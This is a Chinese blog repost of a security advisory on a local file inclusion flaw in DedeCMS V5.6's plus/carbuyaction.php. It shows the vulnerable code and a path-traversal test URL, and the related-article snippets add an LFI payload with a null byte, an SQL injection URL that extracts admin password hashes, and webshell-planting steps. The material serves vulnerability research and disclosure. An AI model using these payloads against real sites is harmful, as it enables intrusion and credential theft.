织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞

最新推荐文章于 2024-10-14 00:28:24 发布
最新推荐文章于 2024-10-14 00:28:24 发布
阅读量1.1k 收藏
点赞数
文章标签: php javascript ViewUI
漏洞版本:
DedeCmsV5.6
漏洞描述:
DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。

1	<?php
02	require_once (dirname(__FILE__) . "/../include/common.inc.php");
03	define('_PLUS_TPL_', DEDEROOT.'/templets/plus');
04	require_once DEDEINC.'/dedetemplate.class.php';
05	require_once DEDEINC.'/shopcar.class.php';
06	require_once DEDEINC.'/memberlogin.class.php';
07	 
08	if($cfg_mb_open=='N')
09	{
10	        ShowMsg("系统关闭了会员功能,因此你无法访问此页面!","javascript:;");
11	        exit();
12	}
13	 
14	$cfg_ml = new MemberLogin();
15	 
16	if(!isset($dopost) || empty($dopost)){   //只要$dopost不为空就行,By:俺是农村的。
17	        ...
18	}elseif($dopost == 'return'){
19	        require_once DEDEINC.'/payment/'.$code.'.php';  //变量$code未初始化,By:俺是农村的。
20	        $pay = new $code;
21	        $msg=$pay->respond();
22	        ShowMsg($msg,"javascript:;",0,3000);
23	        exit();  
24	}
25	?>
<* 参考
http://www.t00ls.net/
http://sebug.net
http://sebug.net/appdir/织梦(DedeCms)
*>
测试方法:
@Sebug.net   dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
    1. http://www.ssvdb.com/plus/carbuyaction.php?dopost=return&code=../../
weixin_34090643
关注
Dedecms 前端RCE分析
include_voidmain的博客
03-10 681
Dedecms 前端RCE分析
Dedecms中一个重大漏洞文件carbuyaction.php,请注意修复
zxy840552216的博客
09-15 556
使用过DEDECMS的人,可能很多都知道了这个漏洞,在DEDECMS5.X版本中,这个文件漏洞一直存在,文件如下:漏洞文件carbuyaction.php 首先利用cookie修改工具,加上code=alipay然后访问 http://www.xxx.com/plus/carbuyaction.php?dopost=return&code=../../uploads/userup/xx/myface.gif%00 直接包含成功 利用条件为GPCOFF,或者某些环境下的...
DedeCMS漏洞文件之carbuyaction.php
xvrywgb的专栏
01-13 2555
DedeCMS漏洞文件之carbuyaction.php dedecms教程 DedeCMS漏洞文件之carbuyaction.php,这个漏洞长达几年,跨了几个版本,网上也公开过了,DedeCMS就是不修复,可以直接导致拿shell 详细说明:漏洞文件carbuyaction.php 本地试了一下,最新DedeCMS版本一样可行。 首先利用cookie修
DeDeCMS漏洞复现
cheapkiller的博客
08-03 228
点击-》 【 index.htm 】 --> 【模板】 --》 【默认模板管理】 【修改】 在⽂件修改中添加⼀句话代码。点击 【模块】--》 【⼴告管理】 【增加⼀个新⼴告】 --》在 【⼴告内容】 处添加加⼀句话代码--》点击 【确定】添加完成后点击【代码】在图中显示的路径与站点进⾏拼接....访问测试!上传文件上传一句话木马然后打开即可。然后更新html后缀名改为php。打开成功后在蚁剑工具中进行连接。打开环境登陆后台进行修改文件。文件内容写一个可以执行的内容。添加的内容写入一句话木马。
DedeCms 5.x 本地文件包含漏洞(respond方法)
weixin_33795743的博客
03-21 265
漏洞版本: DedeCms 5.x 漏洞描述: DedeCms是免费的PHP网站内容管理系统。 plus/carbuyaction.php里没有对变量进行严格的过滤 出现漏洞的两个文件为: Include/payment/alipay.php Include/payment/yeepay.php 漏洞均出现在respond方法里 Include/payme...
DedeCms V5.6 本地包含里的上传漏洞(可是那包含漏洞已经公布)
weixin_33742618的博客
04-19 437
2019独角兽企业重金招聘Python工程师标准>>> ...
DEDE织梦支付插件
08-28
http://您的网站域名/plus/carbuyaction.php?dopost=return&code=XddpayAlipay 异步通知网址:http://您的网站域名/XddpayNotify.php 4、在DEDE后台【系统】->【支付工具】->【支付接口设置】可以看到安装的接口 ...
web应用漏洞.docx
07-05
4. DedeCMS 5.7 SP1 /install/index.php 远程文件包含漏洞:攻击者可以通过该漏洞执行任意代码。 5. ECShop /api/client/lib_api.php 盲注漏洞:攻击者可以通过该漏洞执行任意 SQL 语句。 6. ECShop 2.7.3 /includes...
Dedecms存在储存型跨站脚本漏洞1
08-03
漏洞存在于Dedecms的会员功能模块,特别是"shop"模块中的`carbuyaction.php`文件。 漏洞细节: 在DedeCMSV5.7-UTF8-SP2版本中,当用户在进行购物操作时,提交的`address`、`des`、`email`和`postname`这四个...
教你如何去除织梦5.7版权.txt
11-02
在探讨如何去除织梦5.7版权之前,我们首先需要了解织梦DedeCMS)的基本概念及其版权信息的重要性。织梦CMS是一款广泛使用的开源内容管理系统,它基于PHP语言开发,支持MySQL数据库。由于其功能强大、扩展性好以及...
织梦Dedecms buy_action.php SQL注入漏洞分析
深秋哋黎明的专栏
11-20 5670
Dedecms buy_action.php SQL注入漏洞分析 0x01 补丁对比 通过对比源码和2月25日补丁发现被改动的文件有三个,buy_action.php、uploadsafe.inc.php和sys_info.htm。 sys_info.htm只是添加了一个重置cfg_cookie_encode的代码,而且是静态文件,可以忽略掉。uploadsafe.inc.php
织梦config_base.php 目录在哪里,Dedecms织梦文件目录结构全面解析
weixin_30183847的博客
03-12 538
Dedecms织梦文件目录结构全面解析织梦无忧2018-12-07 08:36摘要:鉴于很多新手朋友不知道织梦很多目录和文件具体有何作用,而现互联网亦没有相对全面的dedecms文件目录解说,so,织梦新手网在相对全面的基础上整理了以下目录文件,织梦58首发! 以下一些目录对应的文件和代表的含义均是在相对详细下完成的,如若有错误请联鉴于很多新手朋友不知道织梦很多目录和文件具体有何作用,而现互联网亦...
关于Dedecms织梦文件目录结构全面解析
qq_17475727的博客
08-19 757
本文主要是为了今后对Dedecms做二次开发所写。 安装后dedecms的目录,如下图所示 “a”: 默认HTML文件存放目录 “data”: 系统缓存或其它可写入数据存放目录 “dede”: 默认后台管理目录 “images”: 系统默认模板图片存放目录 “include”: 类库文件目录 “install”: 安装程序目录,安装完后可删除 “member”: 会员目录 “plus”: 附助...
DedeCMS_v5.7漏洞复现
qq_51459600的博客
04-06 1万+
DedeCMS_v5.7漏洞复现 环境搭建: 服务器:WinServer2008(10.10.10.143) + phpstudy2018 DedeCMS版本:DedeCMS-V5.7-UTF8-SP2 下载地址:https://pan.baidu.com/s/1GQjWSDe7IlMVsVJ7HvrBOw 提取码: i4wk 0x01 URL重定向 版本<=5.7sp2 漏洞复现 payload: http://10.10.10.143/Dedecms/plus/download.php?open
dedecms 漏洞汇总
热门推荐
积木网络
02-29 1万+
Dedecms 5.6 rss注入漏洞   http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2)) AND "'" AND updatexml(1,(SELECT CONCAT(0x5b,uname,0x3a,MID(pwd,4,16),0x5d) FROM dede_admin),1)#'][0]=1 DedeCms v5.6 嵌入
Dedecms文件目录结构解说
﹎厡.唻
08-31 1116
织梦:DedeAMPZ/Web /根目录  ../a 默认生成文件存放目录  ../data 系统缓存或其他可写入数据存放目录  ../dede 默认后台登录管理(可任意改名)  ../images 系统默认的部分系统需要的图片目录  ../include 程序核心系统文件目录  ../install 安装文件目录  ../member 会员系统目录  ../plus
【OSCP Proving Grounds 靶场系列】Slort
最新发布
Eason_LYC安全白帽子的成长博客
10-14 418
【OSCP Proving Grounds 靶场系列】Slort
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值